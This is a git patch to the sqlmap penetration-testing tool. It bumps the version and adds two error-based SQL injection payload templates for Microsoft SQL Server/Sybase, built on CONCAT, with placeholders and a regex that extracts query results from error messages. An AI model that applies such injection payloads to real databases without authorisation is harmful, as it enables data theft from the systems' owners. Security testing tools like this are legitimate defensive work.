From 439fff684effe7526c99a5b7fb5681cf06470342 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 11 May 2016 09:42:54 +0200 Subject: [PATCH] Minor update (MSSQL CONCAT payload) --- lib/core/settings.py | 2 +- xml/payloads/02_error_based.xml | 42 +++++++++++++++++++++++++++++++++ 2 files changed, 43 insertions(+), 1 deletion(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 50f02decb..e86773aa9 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS from lib.core.revision import getRevisionNumber # sqlmap version (...) -VERSION = "1.0.5.18" +VERSION = "1.0.5.19" REVISION = getRevisionNumber() STABLE = VERSION.count('.') <= 2 VERSION_STRING = "sqlmap/%s#%s" % (VERSION, "stable" if STABLE else "dev") diff --git a/xml/payloads/02_error_based.xml b/xml/payloads/02_error_based.xml index 42737fbdb..72fc87199 100644 --- a/xml/payloads/02_error_based.xml +++ b/xml/payloads/02_error_based.xml @@ -388,6 +388,48 @@ + + Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT) + 2 + 2 + 1 + 1,9 + 1 + AND [RANDNUM]=CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]') + + AND [RANDNUM]=CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)),'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Microsoft SQL Server + Sybase + Windows +
+ + + + Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONCAT) + 2 + 3 + 3 + 1,9 + 2 + OR [RANDNUM]=CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]') + + OR [RANDNUM]=CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)),'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Microsoft SQL Server + Sybase + Windows +
+ + Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN) 2